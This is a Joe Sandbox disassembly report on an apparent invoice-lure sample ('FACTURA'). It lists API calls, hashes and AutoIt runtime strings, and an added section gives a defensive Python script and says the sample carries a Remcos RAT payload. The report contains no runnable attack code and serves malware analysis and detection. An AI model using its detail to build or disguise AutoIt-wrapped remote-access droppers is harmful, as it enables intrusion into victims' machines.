                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: 17be52230a5d9c3932da48ea96fdddf3652a0d8f94308092b39d3889c0531a82
                                                                            • Instruction ID: 7a6b08ea88d0acf7f0986e483e66cb3f0a0c78fc4e50d7499a79c4b9fe062c57
                                                                            • Opcode Fuzzy Hash: 17be52230a5d9c3932da48ea96fdddf3652a0d8f94308092b39d3889c0531a82
                                                                            • Instruction Fuzzy Hash: 8A31A131988319ABDB04FB60EE43FEE77A49B10760F30101AB451711E1FB65EF04A652
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00F45013
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00F4501E
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00F45029
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00F45034
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00F4503F
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00F4504A
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00F45055
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00F45060
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00F4506B
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00F45076
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00F45081
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00F4508C
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00F45097
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00F450A2
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00F450AD
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00F450B8
                                                                            • GetCursorInfo.USER32(?), ref: 00F450C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$Info
                                                                            • String ID:
                                                                            • API String ID: 2577412497-0
                                                                            • Opcode ID: 038a6928a623390c8153a5f8ec75cf56e7c9b529f063660c2faa7abfb6162f7e
                                                                            • Instruction ID: c201e9b63a770e3e4bf06fd62b0bbb55e314f8e0e2786a5a008cf269ac8f63ff
                                                                            • Opcode Fuzzy Hash: 038a6928a623390c8153a5f8ec75cf56e7c9b529f063660c2faa7abfb6162f7e
                                                                            • Instruction Fuzzy Hash: 1131F4B1D4831E6BDF109FB68C8995FBFE8FF08750F50452AA50DE7281DA78A5009F91
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F5A259
                                                                            • DestroyWindow.USER32(?,?), ref: 00F5A2D3
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F5A34D
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F5A36F
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5A382
                                                                            • DestroyWindow.USER32(00000000), ref: 00F5A3A4
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00ED0000,00000000), ref: 00F5A3DB
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5A3F4
                                                                            • GetDesktopWindow.USER32 ref: 00F5A40D
                                                                            • GetWindowRect.USER32(00000000), ref: 00F5A414
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F5A42C
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F5A444
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1297703922-3619404913
                                                                            • Opcode ID: 8314df981ca7ed61b4591a89a9a8611f84f9473fcfdeb836a61d9437b4f71fb1
                                                                            • Instruction ID: 5fb2c3f68cd7d0f05df6168742359b9dc4adf2f4a26456e6be2bbd773b4d0c90
                                                                            • Opcode Fuzzy Hash: 8314df981ca7ed61b4591a89a9a8611f84f9473fcfdeb836a61d9437b4f71fb1
                                                                            • Instruction Fuzzy Hash: E371CE70540708AFD721CF28CC49F6A7BE5FB88715F04462DFA85872A0D771E91AEB52
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F54424
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F5446F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: f0d2e618aae340d8df67eded0e8beea16bdbf022d813eef4dd97745bbea597c3
                                                                            • Instruction ID: ec2d98be13ab7c0ca31af7ee09a1a096cfb1d10b134a9dddbadb03b7a7df9165
                                                                            • Opcode Fuzzy Hash: f0d2e618aae340d8df67eded0e8beea16bdbf022d813eef4dd97745bbea597c3
                                                                            • Instruction Fuzzy Hash: 1F918A356047018BCB08EF10C851A6EB7E1AF85754F0448A9FD926B3A3CB34EC4AEB81
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F5B8B4
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F591C2), ref: 00F5B910
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F5B949
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F5B98C
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F5B9C3
                                                                            • FreeLibrary.KERNEL32(?), ref: 00F5B9CF
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5B9DF
                                                                            • DestroyCursor.USER32(?), ref: 00F5B9EE
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F5BA0B
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F5BA17
                                                                              • Part of subcall function 00EF2EFD: __wcsicmp_l.LIBCMT ref: 00EF2F86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 3907162815-1154884017
                                                                            • Opcode ID: e919103f6db9cf4c8931302223f6036ba1f71b65e380cd9c6c2e8bb7267efa3c
                                                                            • Instruction ID: 7446a3b7abd34b33eecb2b1c6b4ec8b8e6f98fe713b3dea2a13ecc0a4ae52cf7
                                                                            • Opcode Fuzzy Hash: e919103f6db9cf4c8931302223f6036ba1f71b65e380cd9c6c2e8bb7267efa3c
                                                                            • Instruction Fuzzy Hash: B361D071900219BAEB14DF64DC45FBE7BA8FB08722F10411AFF15E61C1DB749989EBA0
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 00F3DCDC
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F3DCEC
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F3DCF8
                                                                            • __wsplitpath.LIBCMT ref: 00F3DD56
                                                                            • _wcscat.LIBCMT ref: 00F3DD6E
                                                                            • _wcscat.LIBCMT ref: 00F3DD80
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3DD95
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DDA9
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DDDB
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DDFC
                                                                            • _wcscpy.LIBCMT ref: 00F3DE08
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F3DE47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            • Opcode ID: 06cf039dc0502c90d7b987b746cbe6b33b9b375398cde9b7278627bb6aa20555
                                                                            • Instruction ID: 7423ecdfd947d5d01e593f49f873cc8158bbccae1c0559a4b5c6174c1a391fef
                                                                            • Opcode Fuzzy Hash: 06cf039dc0502c90d7b987b746cbe6b33b9b375398cde9b7278627bb6aa20555
                                                                            • Instruction Fuzzy Hash: 23618CB65043059FCB10EF60D8449AEB3E8FF89324F04492EF989D7251DB35EA49DB92
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F39C7F
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F39CA0
                                                                            • __swprintf.LIBCMT ref: 00F39CF9
                                                                            • __swprintf.LIBCMT ref: 00F39D12
                                                                            • _wprintf.LIBCMT ref: 00F39DB9
                                                                            • _wprintf.LIBCMT ref: 00F39DD7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-3080491070
                                                                            • Opcode ID: e8ea01191c96a762530225d79c086a93e15eec9796d9d50a235e09858e27f65b
                                                                            • Instruction ID: 5abae864b4cececf6f374092c9404a3c17f1e5bf11ffa68ff3817337eb2ed01b
                                                                            • Opcode Fuzzy Hash: e8ea01191c96a762530225d79c086a93e15eec9796d9d50a235e09858e27f65b
                                                                            • Instruction Fuzzy Hash: 4951D232900609AACF15FBE0CD46EEEB7B9EF04310F500066F545721A1EB716F5AEB61
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F3A3CB
                                                                            • GetDriveTypeW.KERNEL32 ref: 00F3A418
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3A460
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3A497
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3A4C5
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 2698844021-4113822522
                                                                            • Opcode ID: 6417fe74aadcf8d3d163b4b28019f2a6e60a945290491503381772654c24bc5a
                                                                            • Instruction ID: 0e4c8606c0df72a427c879b6adbbcd01bdce321cef7885696f85849c60fe5710
                                                                            • Opcode Fuzzy Hash: 6417fe74aadcf8d3d163b4b28019f2a6e60a945290491503381772654c24bc5a
                                                                            • Instruction Fuzzy Hash: 7E516E715043059FC704EF21C99186AB3F4EF88768F40886EF89667362DB31ED0ADB52
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F2F8DF
                                                                            • LoadStringW.USER32(00000000,?,00F0E029,00000001), ref: 00F2F8E8
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • GetModuleHandleW.KERNEL32(00000000,00F95310,?,00000FFF,?,?,00F0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F2F90A
                                                                            • LoadStringW.USER32(00000000,?,00F0E029,00000001), ref: 00F2F90D
                                                                            • __swprintf.LIBCMT ref: 00F2F95D
                                                                            • __swprintf.LIBCMT ref: 00F2F96E
                                                                            • _wprintf.LIBCMT ref: 00F2FA17
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F2FA2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: f5d1fe55ddef9dedfba4daa7b0b355d10ac3a8088606e2f0d2b0d9991d7bd639
                                                                            • Instruction ID: 1fe7d6aecd3f02c99e0617c3d36a16ec99681597721c29b469231b057499814a
                                                                            • Opcode Fuzzy Hash: f5d1fe55ddef9dedfba4daa7b0b355d10ac3a8088606e2f0d2b0d9991d7bd639
                                                                            • Instruction Fuzzy Hash: 0A41617280421DAACF04FBE0DD56DEEB7B9EF18340F500066B505B2192EE355F4ADB61
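The two error-reporting functions above (LoadStringW, __swprintf, MessageBoxW) and the GUI helper functions carry fixed runtime strings in their String ID fields, such as `Line %d (File "%s"):`, `^ ERROR`, `Incorrect parameters to object property !` and `tooltips_class32`. Because these functions call the wide-character API variants, the strings sit in the image as UTF-16LE. The following Python script is an added triage example, not part of the Joe Sandbox report or of the sample: it searches a dump or PE image for those strings in both UTF-16LE and ASCII and reports whether enough distinct ones are present to corroborate the "compiled AutoIt script" verdict. The strings are copied from the String ID fields above; the sample buffer is constructed for the demonstration and the threshold of three distinct strings is an assumption, not a tuned value.

```python
"""Heuristic triage: search a memory dump or PE image for the AutoIt runtime
strings listed in this report's String ID fields, in UTF-16LE and ASCII.
Added example; not code from Joe Sandbox or from the analysed sample."""
import re

# Strings taken from the String ID fields of the report above. The functions
# that reference them use the 'W' API variants, so in the image they are
# UTF-16LE; both encodings are searched in case a dump was already converted.
AUTOIT_RUNTIME_STRINGS = (
    'Line %d (File "%s"):',
    "^ ERROR",
    "Error: ",
    "Incorrect parameters to object property !",
    "tooltips_class32",
    "set cd door",
    "type cdaudio alias cd wait",
)


def find_indicators(blob: bytes) -> dict:
    """Return {string: [offsets]} for every listed string found in blob."""
    hits = {}
    for s in AUTOIT_RUNTIME_STRINGS:
        offsets = []
        for enc in ("utf-16-le", "ascii"):
            needle = s.encode(enc)
            offsets.extend(m.start() for m in re.finditer(re.escape(needle), blob))
        if offsets:
            hits[s] = sorted(offsets)
    return hits


def looks_like_autoit(blob: bytes, min_distinct: int = 3) -> bool:
    """True when at least min_distinct different runtime strings are present.
    The threshold is an assumption chosen for this example, not a tuned value."""
    return len(find_indicators(blob)) >= min_distinct


# Constructed sample buffer (not a real dump): filler bytes with three of the
# strings embedded as UTF-16LE and one as ASCII.
SAMPLE = (
    b"\x00" * 16
    + 'Line %d (File "%s"):'.encode("utf-16-le")
    + b"\x90" * 8
    + "^ ERROR".encode("utf-16-le")
    + b"MZ" + b"\x00" * 4
    + b"tooltips_class32"
    + "Error: ".encode("utf-16-le")
)

if __name__ == "__main__":
    # Replace SAMPLE with open("dump.sdmp", "rb").read() to scan a real dump.
    for s, offs in find_indicators(SAMPLE).items():
        print(f"{s!r:45} at {[hex(o) for o in offs]}")
    print("AutoIt runtime strings present:", looks_like_autoit(SAMPLE))
```

Matching on these strings only says that the AutoIt runtime is present, which is what the report's "compiled AutoIt script" signature already states; the Remcos payload itself is decoded from the script at run time, so a dump taken after execution should be scanned separately for the RAT's configuration.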
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F59207,?,?), ref: 00F5BA56
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA6D
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA78
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA85
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00F5BA8E
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA9D
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00F5BAA6
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BAAD
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F5BABE
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F62CAC,?), ref: 00F5BAD7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00F5BAE7
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00F5BB0B
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F5BB36
                                                                            • DeleteObject.GDI32(00000000), ref: 00F5BB5E
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F5BB74
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 93ca13e0f72c43f5ceda1f866141e9dd1048156adfe8b3af568e9f5b43fdc06c
                                                                            • Instruction ID: 1506395404ee39b2fab873e1d1fa92c05ceb88b613274f7f31a5f4bf8eac6248
                                                                            • Opcode Fuzzy Hash: 93ca13e0f72c43f5ceda1f866141e9dd1048156adfe8b3af568e9f5b43fdc06c
                                                                            • Instruction Fuzzy Hash: A741FA75900208FFDB119F65DC48EABBBB9EB89722F1040A8FA05D7260D7749945EB60
                                                                            APIs
                                                                              • Part of subcall function 00EF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00ED6B0C,?,00008000), ref: 00EF0973
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00ED6BAD
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED6CFA
                                                                              • Part of subcall function 00ED586D: _wcscpy.LIBCMT ref: 00ED58A5
                                                                              • Part of subcall function 00EF363D: _iswctype.LIBCMT ref: 00EF3645
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$/v$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-3512645892
                                                                            • Opcode ID: 1188e92164fc988d233f1db89faec032cde0059c0190ef97ec2c34170f9b9647
                                                                            • Instruction ID: 3bba64475bbdad70dea1da3f3ff8b265d0149680565ec719f1d8617119472609
